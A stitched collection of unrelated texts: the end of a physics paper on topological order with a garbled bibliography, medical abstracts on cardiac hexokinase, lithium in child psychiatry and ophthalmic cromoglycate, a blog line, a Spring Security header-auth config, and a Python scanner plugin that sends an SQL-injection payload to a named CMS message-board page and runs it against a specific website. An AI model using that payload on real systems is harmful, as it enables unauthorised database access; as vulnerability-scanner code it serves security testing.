$\mathscr{G}_{\mathbb{I}}\mathbf{L}-\mathbf{L}=0$ and $\mathscr{G}_{\mathbb{I}}\mathbf{N}_m-\mathbf{N}_m=0$ by choosing $n_1=n_2=n_3=n_4=0$ for all $\mathbf{L}$’s and $\mathbf{N}_m$’s. Then, elements of $\mathsf{Inner}(K)$ have associativity arising from the standard matrix multiplication. For the existence of the inverse element, we need to prove that $W^{-1}\oplus\Omega^{-1}\in\mathsf{Inner}(K)$. By definition, for $W\oplus \Omega\in\mathsf{Inner}(K)$, the operation of $W$ is $$\begin{aligned} W^{-1}\mathbf{N}_m-\mathbf{N}_m=K^T \mathbf{J}_{W,\mathbf{N}_m}\,,\nonumber \end{aligned}$$ where the notation $\mathbf{J}_{W,\mathbf{N}_m}$ denotes the integer vector $(n_1,n_2)^T$ and the subscript $W,\mathbf{N}_m$ means that the integer vector is a function of $W$ and $\mathbf{N}_m$. Likewise, we also have: $$\begin{aligned} W^{-1} (W\mathbf{N}_m)-W\mathbf{N}_m=K^T \mathbf{J}_{W,W\mathbf{N}_m}.\nonumber \end{aligned}$$ As a result, $W\mathbf{N}_m-\mathbf{N}_m=-K^T \mathbf{J}_{W,W\mathbf{N}_m}$. Since $-\mathbf{J}_{W,W\mathbf{N}_m}$ is an integer vector, we obtain the operation of $W^{-1}$: $$\begin{aligned} (W^{-1})^{-1}\mathbf{N}_m-\mathbf{N}_m=K^T (-\mathbf{J}_{W,W\mathbf{N}_m})\nonumber \end{aligned}$$ which exactly satisfies the defining property of $\mathsf{Inner}(K)$. Likewise, we can also prove that $\Omega^{-1}$ is an operation in $\mathsf{Inner}(K)$. Therefore, the inverse element $\mathscr{G}^{-1}=W^{-1}\oplus \Omega^{-1}\in\mathsf{Inner}(K)$. For the closure property, we need to prove that $\mathscr{G}'\cdot\mathscr{G}\in \mathsf{Inner}(K)$ if $\mathscr{G}'\in \mathsf{Inner}(K)$ and $\mathscr{G}\in \mathsf{Inner}(K)$. For this purpose, let us calculate: $$\begin{aligned} &(W'W)^{-1}\mathbf{N}_m-\mathbf{N}_m \nonumber\\ =&W^{-1}{W'}^{-1}\mathbf{N}_m-\mathbf{N}_m=W^{-1}\left( \mathbf{N}_m+K^T\mathbf{J}_{W',\mathbf{N}_m}\right)\!-\!\mathbf{N}_m\nonumber\\ =&\!\left(W^{-1} \mathbf{N}_m\!-\!\mathbf{N}_m\right)\!+W^{-1}K^T\mathbf{J}_{W',\mathbf{N}_m}\nonumber\\ =&K^T\! \mathbf{J}_{W,\mathbf{N}_m}\! +\!K^T\Omega^T\mathbf{J}_{W',\mathbf{N}_m}=K^T\!\left(\mathbf{J}_{W,\mathbf{N}_m}\!+\Omega^T\mathbf{J}_{W',\mathbf{N}_m}\!\right)\,,\nonumber\end{aligned}$$ where we have used $W^{-1}K^T=K^T\Omega^T$ that is an equivalent expression of condition (i). Since $\mathbf{J}_{W,\mathbf{N}_m}+\Omega^T\mathbf{J}_{W',\mathbf{N}_m}$ is an integer vector (by noting that $\Omega$ is unimodular), we conclude that $W'W$ satisfies the defining property of $\mathsf{Inner}(K)$. So does $\Omega\Omega'$. Therefore, $\mathscr{G}'\cdot\mathscr{G}\in \mathsf{Inner}(K)$. is to prove that $\mathsf{Inner}(K)$ is normal. In other words, we need to verify that $W'W{W'}^{-1}\in\mathsf{Inner}(K)$ and $\Omega'\Omega{\Omega'}^{-1}\in\mathsf{Inner}(K)$ for $\forall W,\Omega \in\mathsf{Inner}(K)$ and $\forall W',\Omega'\in\mathsf{Auto}(K)$. For this purpose, let us calculate: $$\begin{aligned} &(W'W{W'}^{-1})^{-1}\mathbf{N}_m-\mathbf{N}_m=W'(W^{-1}{W'}^{-1}\mathbf{N}_m)-\mathbf{N}_m\nonumber\\ =&W'( {W'}^{-1}\mathbf{N}_m+K^T\mathbf{J}_{W,{W'}^{-1}\mathbf{N}_m})-\mathbf{N}_m\nonumber\\ =&W'K^T\mathbf{J}_{W,{W'}^{-1}\mathbf{N}_m}.\nonumber\end{aligned}$$ Since $W'\in\mathsf{Auto}(K)$, condition (i) in Eq. (\[eqn:auto\]) leads to: $\Omega' K{W'}^{T}=K,$ and thereby ${W'}K^T{\Omega'}^{T}=K^T$. Therefore, ${W'}K^T=K^T({\Omega'}^{T})^{-1}$. $\therefore$ $$\begin{aligned} \!\!\!\!(W'W{W'}^{-1})^{-1}\mathbf{N}_m-\mathbf{N}_m\!=\!K({\Omega'}^{T})^{-1} \mathbf{J}_{W,{W'}^{-1}\mathbf{N}_m}.\nonumber\end{aligned}$$ Since $({\Omega'}^{T})^{-1}$ is obviously a unimodular matrix, it implies that $({\Omega'}^{T})^{-1} \mathbf{J}_{W,{W'}^{-1}\mathbf{N}_m}$ is an integer vector. Thus, by the definition of $\mathsf{Inner}(K)$, $W'W{W'}^{-1}\in\mathsf{Inner}(K)$. Likewise, we also have $\Omega'\Omega{\Omega'}^{-1}\in\mathsf{Inner}(K)$. $\therefore$ we conclude that $\mathsf{Inner}(K)$ is a normal subgroup of $\mathsf{Auto}(K)$. Then, according to the definition of $\mathsf{Charles}$, the elements of $\mathsf{Charles}$ form a quotient group of $\mathsf{Auto}(K)$ by $\mathsf{Inner}(K)$. It can be non-Abelian since $\mathscr{G}\cdot \mathscr{G}'\neq \mathscr{G}'\cdot \mathscr{G}$ may hold for some elements. Graphical representations of $\mathsf{Charles}$ transformations --------------------------------------------------------------- Eqs. (\[eqn:auto\],\[eqn:auto33\],\[eqn:auto44\]) are graphically represented in Fig. \[figure\_tensor\] where a tensor-network-type graph is introduced. ![(Color online) Tensor-network-type graphical representations of $\mathsf{Charles}$ transformations. (a) represents Eq. (\[eqn:auto\]) where $K$ is a fixed-point matrix. (b) represents Eq. (\[eqn:auto33\]) where $\Lambda$ is a fixed-point tensor with a bond dimension no less than two. (c) represents Eq. (\[eqn:auto44\]) where $\Xi$ is a fixed-point tensor with a bond dimension no less than four.[]{data-label="figure_tensor"}](figure_tensor.pdf){width="8.5cm"} [139]{}ifxundefined \[1\][ ifx[\#1]{} ]{}ifnum \[1\][ \#1firstoftwo secondoftwo ]{}ifx \[1\][ \#1firstoftwo secondoftwo ]{}““\#1””@noop \[0\][secondoftwo]{}sanitize@url \[0\][‘\ 12‘\$12 ‘&12‘\#12‘12‘\_12‘%12]{}@startlink\[1\]@endlink\[0\]@bib@innerbibempty [****,  ()](\doibase 10.1103/PhysRevLett.45.494) [****,  ()](\doibase 10.1103/PhysRevLett.61.2015) [****,  ()](\doibase 10.1103/PhysRevB.75.121306) [****,  ()](\doibase 10.1103/PhysRevLett.98.106803) [****, ()](\doibase 10.1103/PhysRevB.79.195322) [****, ()](\doibase 10.1103/RevModPhys.82.3045) [****, ()](http://dx.doi.org/10.1038/nature08916) [****,  ()](\doibase 10.1103/RevModPhys.83.1057) [****,  ()](\doibase 10.1038/nphys1274) [****,  ()](\doibase 10.1016/0038-1098(87)90642-9) [****, ()](\doibase 10.1103/PhysRevB.37.580) [****, ()](\doibase 10.1103/PhysRevB.37.3774) [****,  ()](\doibase 10.1103/PhysRevB.38.5142) [****,  ()](\doibase 10.1143/JPSJ.57.2768) [****,  ()](\doibase 10.1103/PhysRevB.38.745) [****,  ()](\doibase 10.1103/PhysRevB.38.2926) [****,  ()](\doibase 10.1103/PhysRevB.39.11413) [****, ()](\doibase 10.1103/PhysRevB.44.2664) [****,  ()](\doibase 10.1103/PhysRevB.46.5621) [****, ()](\doibase 10.1103/PhysRevB.49.5200) [****,  ()](\doibase 10.1103/PhysRevLett.76.503) [****,  ()](\doibase 10.1103/RevModPhys.78.17) [****,  ()](\doibase 10.1103/PhysRevB.55.3894) [****,  ()](\doibase 10.1103/PhysRevLett.106.147002) [****,  ()](\doibase 10.1016/j.nuclphysb.2011.09.019) [****,  ()](\doibase 10.1103/PhysRevB.85.205142) [****, ()](\doibase 10.1088/1367-2630/16/8/083039) [****, ()](\doibase 10.1016/j.nuclphysb.2013.05.023) [****, ()](\doibase 10.1103/PhysRevB.40.8079) [****,  ()](\doibase 10.1142/S0217984991000058) [****, ()](\doibase 10.1103/PhysRevB.60.8827) [****, ()](\doibase 10.1103/PhysRevB.81.155302) [****,  ()](\doibase 10.1103/PhysRevB.89.184417) [****,  ()](\doibase 10.1103/PhysRevB.87.195128) [****,  ()](\doibase 10.1103/PhysRevB.89.045127) [****,  ()](\doibase 10.1103/PhysRevB.91.195131) [****,  ()](\doibase 10.1103/PhysRevB.90.235146) [****,  ()](\doibase 10.1103/PhysRevB.80.155131) [****,  ()](\doibase 10.1103/PhysRevB.87.155114) [****,  ()](\doibase 10.1126/science.1227224) [****,  ()](\doibase 10.1103/PhysRevB.82.155138) [****,  ()](\doibase 10.1016/0550-3213(81)90442-9) [****,  ()](\doibase 10.1016/0003-4916(82)90164-6) [****,  ()](\doibase 10.1016/0370-1573(80)90083-6) [****,  ()](\doibase 10.1016/0003-4916(78)90252-X) [****,  ()](\doibase 10.1016/0370-2693(75)90162-8) [****,  ()](\doibase 10.1016/0550-3213(77)90086-4) [****,  ()](\doibase 10.1016/0370-2693(78)90737-2) [****,  ()](\doibase 10.1016/0550-3213(78)90153-0) [****,  ()](\doibase 10.1016/0550-3213(79)90595-9) [****,  ()](\doibase 10.1103/PhysRevD.20.2610) [****,  ()](\doibase 10.1103/PhysRevD.17.2637) @noop [**]{} (, ) [****,  ()](\doibase 10.1016/0550-3213(94)90214-3) [****, ()](\doibase 10.1007/JHEP08(2013)115) [****,  ()](\doibase 10.1103/PhysRevB.79.045316) [****,  ()](\doibase 10.1103/PhysRevB.91.045134) [****,  ()](\doibase 10.1016/0370-2693(79)90838-4) [****,  ()](\doibase 10.1103/PhysRevB.78.195424) [****, ()](\doibase 10.1103/PhysRevLett.63.199) @noop [**]{} (, ) [****, ()](\doibase 10.1103/PhysRevB.44.5246) [****,  ()](\doibase 10.1103/PhysRevB.47.7312) [****,  ()](\doibase 10.1103/PhysRevLett.79.4437) [****,  ()](\doibase 10.1016/j.physe.2003.09.022),  [****,  ()](\doibase 10.1103/RevModPhys.75.1101) [****, ()](\doibase 10.1103/PhysRevB.82.035105) [****,  ()](\doibase 10.1103/PhysRevLett.105.246809) [****,  ()](\doibase 10.1103/PhysRevB.86.235128) [****, ()](http://dx.doi.org/10.1038/nphys3311) [****,  ()](\doibase 10.1103/PhysRevB.83.195139) [****,  ()](\doibase 10.1103/PhysRevB.86.245111) [****,  ()](\doibase 10.1016/j.aop.2015.05.012) [****,  ()](\doibase 10.1103/PhysRevB.90.235149) [****,  ()](\doibase 10.1103/PhysRevB.88.035141) [****, ()](\doibase 10.1103/PhysRevB.81.045323) [****,  ()](\doibase 10.1103/PhysRevB.90.155111) [“,” ](http://arxiv.org/abs/1410.4540) (), ,  [****,  ()](\doibase 10.1103/PhysRevB.86.161107) [****, ()](\doibase 10.1103/PhysRevX.2.031013) [****,  ()](\doibase 10.1103/PhysRevB.87.045130) [****, ()](\doibase 10.1103/PhysRevX.4.041035) [****,  ()](\doibase 10.1103/PhysRevLett.114.026401) [****,  ()](\doibase 10.1103/PhysRevLett.105.030403) [****,  ()](\doibase 10.1016/0550-3213(82)90463-1) [****,  ()](\doibase 10.1016/0550-3213(82)90464-3) [****,  ()](\doibase 10.1142/S0217732389000046) [****,  ()](\doibase 10.1007/BF01218410) [****, ()](\doibase 10.1103/RevModPhys.52.453) [****,  ()](\doibase 10.1103/PhysRevB.88.235109) [****,  ()](\doibase 10.1103/PhysRevB.88.035131) [“,” ](http://arxiv.org/abs/1405.5858) (), ,  [ (), 10.1093/nsr/nwv077](\doibase 10.1093/nsr/nwv077),  [****,  ()](\doibase 10.1103/PhysRevLett.90.016803) [****, ()](\doibase 10.1016/j.aop.2005.10.005) [****,  ()](\doibase 10.1103/PhysRevB.89.115116) [****,  ()](\doibase 10.1016/0003-4916(91)90240-9) [****,  ()](\doibase 10.1016/0550-3213(94)00503-7) [****,  ()](\doibase 10.1016/S0550-3213(98)00586-0) [****,  ()](\doibase 10.1103/PhysRevLett.92.030406) [****,  ()](\doibase 10.1007/BF02096988) [“,” ](http://arxiv.org/abs/1404.3230) (), , [****,  ()](\doibase 10.1103/PhysRevB.93.205157) [****, ()](\doibase 10.1103/PhysRevLett.113.080403) [“,” ](http://pcts.princeton.edu/pcts/Symmetry2014Program-Web.pdf) (),  [****,  ()](\doibase 10.1103/PhysRevB.91.165119) [****,  ()](\doibase 10.1103/PhysRevB.92.035115) [“,” ](http://arxiv.org/abs/1509.04266) (), ,  [****, ()](\doibase 10.1103/PhysRevB.71.045110) [****, ()](\doibase 10.1103/RevModPhys.77.871) [****,  ()](\doibase 10.1103/PhysRevB.72.035307) [****, ()](\doibase 10.1103/PhysRevB.91.075114) [****,  ()](\doibase 10.1103/PhysRevB.91.035134) [****,  ()](\doibase 10.1103/PhysRevX.4.031048) [****,  ()](\doibase 10.1103/PhysRevB.92.045101) [****,  ()](\doibase 10.1007/JHEP02(2015)172) [ ()](http://arxiv.org/abs/1601.00981),  [“,” ](http://arxiv.org/abs/1602.05951) (), ,  [****,  ()](\doibase 10.1103/PhysRevX.3.011016) [****,  ()](\doibase 10.1103/PhysRevX.5.021029) [****,  ()](\doibase 10.1103/PhysRevB.87.235122) [****,  ()](\doibase 10.1103/PhysRevB.87.174412) [****,  ()](\doibase 10.1103/PhysRevX.4.041049) [“,” ](http://arxiv.org/abs/1404.6659) (), , [****,  ()](\doibase 10.1103/PhysRevB.89.165132) [****,  ()](\doibase 10.1126/science.1243326) [****,  ()](\doibase 10.1088/1742-5468/2013/09/P09016) [****,  ()](\doibase 10.1103/PhysRevB.92.125111) [****,  ()](\doibase 10.1103/PhysRevB.88.115137) [****,  ()](\doibase 10.1103/PhysRevB.91.045134) [****,  ()](\doibase 10.1103/PhysRevB.85.045104) [****,  ()](\doibase 10.1103/PhysRevB.84.014527) [****,  ()](\doibase 10.1103/PhysRevLett.99.196805) @noop [**]{} (, , ) @noop [****,  ()]{} [****,  ()](\doibase 10.1103/PhysRev.176.1480) [****,  ()](\doibase 10.1103/PhysRev.176.1489) [****,  ()](\doibase 10.1103/PhysRev.144.1087) [****,  ()](\doibase 10.1103/PhysRev.173.1536)
{ "pile_set_name": "ArXiv" }
Mitochondrial hexokinase and cardioprotection of the intact heart. The interaction of hexokinase with mitochondria has emerged as a powerful mechanism in protecting many cell types against cell death. However, the role of mitochondrial hexokinase (mitoHK) in cardiac ischemia-reperfusion injury has as of yet received little attention. In this review we examine whether increased binding of hexokinase to the mitochondrion is also an integral component of cardioprotective signalling. We discuss observations in cardiac mitochondrial activation that directed us to the hypothesis of hexokinase cellular redistribution with reversible, cardioprotective ischemia, summarize the data showing that many cardioprotective interventions, such as ischemic preconditioning, insulin, morphine and volatile anesthetics, increase mitochondrial hexokinase binding within the intact heart, and discuss similarities between mitochondrial hexokinase association and ischemic preconditioning. Although most data indicate that mitochondrial hexokinase may indeed be an integral part of cardioprotection, a definitive proof for a causal relation between the amount of mitoHK and cardiac ischemia-reperfusion injury in the intact heart is eagerly awaited. When such relationship is indeed observed, the association of hexokinase with mitochondria will offer an opportunity to develop new therapies to combat ischemic cardiac diseases.
{ "pile_set_name": "PubMed Abstracts" }
package com.box.l10n.mojito.security; import org.springframework.boot.autoconfigure.condition.ConditionalOnExpression; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.security.authentication.AuthenticationManager; import org.springframework.security.core.Authentication; import org.springframework.security.core.AuthenticationException; import org.springframework.security.core.userdetails.UserDetailsByNameServiceWrapper; import org.springframework.security.web.authentication.preauth.PreAuthenticatedAuthenticationProvider; import org.springframework.security.web.authentication.preauth.RequestHeaderAuthenticationFilter; // This must in sync with {@link com.box.l10n.mojito.security.SecurityConfig.AuthenticationType#HEADER} @ConditionalOnExpression("'${l10n.security.authenticationType:}'.toUpperCase().contains('HEADER')") @Configuration class WebSecurityHeaderConfig { @Bean RequestHeaderAuthenticationFilter requestHeaderAuthenticationFilter() throws Exception { RequestHeaderAuthenticationFilter requestHeaderAuthenticationFilter = new RequestHeaderAuthenticationFilter(); requestHeaderAuthenticationFilter.setPrincipalRequestHeader("x-forwarded-user"); requestHeaderAuthenticationFilter.setExceptionIfHeaderMissing(false); requestHeaderAuthenticationFilter.setAuthenticationManager(new AuthenticationManager() { @Override public Authentication authenticate(Authentication authentication) throws AuthenticationException { throw new RuntimeException("This must be overridden with the actual authentication manager of the app - it is not injectable yet with this config style"); } }); return requestHeaderAuthenticationFilter; } @Bean PreAuthenticatedAuthenticationProvider preAuthenticatedAuthenticationProvider() { PreAuthenticatedAuthenticationProvider preAuthenticatedAuthenticationProvider = new PreAuthenticatedAuthenticationProvider(); UserDetailsByNameServiceWrapper userDetailsByNameServiceWrapper = new UserDetailsByNameServiceWrapper(getUserDetailsServiceCreatePartial()); preAuthenticatedAuthenticationProvider.setPreAuthenticatedUserDetailsService(userDetailsByNameServiceWrapper); return preAuthenticatedAuthenticationProvider; } @Bean protected UserDetailsServiceCreatePartialImpl getUserDetailsServiceCreatePartial() { return new UserDetailsServiceCreatePartialImpl(); } }
{ "pile_set_name": "Github" }
[Therapy with lithium salts in child and adolescent psychiatry--clinical efficacy and practical recommendations]. Lithium salts are pharmacologically classified as mood stabilizers and are medications of first choice for the treatment of manic episodes and the prevention of relapse in bipolar disorders in children and adolescents. Moreover, these drugs can be used to treat episodic impulsive aggressiveness. With regard to their use in the treatment of children and adolescents, however, there are limitations to several preparations on the market in Germany. The evidence level for the treatment of acute mania in adolescents is II, while it is only III-IV for treatment of the same disorder in children. There is only anecdotal evidence of relapse prevention in bipolar disorder in childhood (level of evidence: V), whereas the level of evidence for adolescence is higher (IV). With respect to episodic impulsive aggressiveness, there is a good evidence base (II) for treatment of the disorder in both children and adolescents. An evidence level of II indicates that at least one well designed, randomized, controlled study has been carried out; an evidence level of III is based upon non-randomized studies, an evidence level of IV upon non-experimental studies, and an evidence level of V indicates that evidence is limited to reports or opinions stated by expert circles and consensus conferences, and to clinical experience. Due to the narrow therapeutic window, the dosage should be based on serum concentrations of lithium between 0.6 and 1.2 mmol/l and should be adapted according to the clinical picture. Usually, lithium preparations are administered twice a day: in the morning and in the evening. Side effects have to be monitored very carefully. Serum concentrations higher than 1.5 mmol/l are dangerous. All potential side effects, with the exception of very infrequently occurring renal damage, are reversible by means of dose reduction or, if necessary, by discontinuation of medication with lithium.
{ "pile_set_name": "PubMed Abstracts" }
Wednesday, January 2, 2013 1stly.. happy new year for all bloggers... hope all of you have set ur new goal... hhihi iera pown ade my own goal for this year... and i really want to grab it.... ramai yg smbt new year kat stadium... hehehe seronk kew ??
{ "pile_set_name": "Pile-CC" }
Ophthalmic disodium cromoglycate. Disodium cromoglycate has recently been approved for ophthalmic treatment of certain types of conjunctivitis in the United States. This mast cell inhibitor is effective in the treatment of vernal keratoconjunctivitis, allergic conjunctivitis, chronic conjunctivitis, and giant papillary conjunctivitis, especially when a history of atopic disorders or moderately low blood IgE levels are present. This literature review provides a foundation for understanding the balance between the therapeutic efficacy, clinical benefits and side effects in treating IgE-mediated conjunctivitis with disodium cromoglycate.
{ "pile_set_name": "PubMed Abstracts" }
#!/usr/bin/evn python #-*-:coding:utf-8 -*- #Author:404 #Name:铭万信息技术企事业通用建站系统SQL注入(系统不同) #Refer:http://www.wooyun.org/bugs/wooyun-2010-074974 def assign(service,arg): if service=="mainone_b2b": return True,arg def audit(arg): url=arg+"MessageBoard/Default.aspx?hidIsreply=DefaultModule1%24rbIsReply&DefaultModule1%24txtKey=%%27+and+(select%20char(64)%2B@@version)>0%20and%2B%27%%27=%27" code,head,res,errcode,_=curl.curl2(url) if code==500 and "@Microsoft" in res: security_hole(url) if __name__=="__main__": from dummy import * audit(assign('mainone_b2b','http://www.semi-chip.com/')[1])
{ "pile_set_name": "Github" }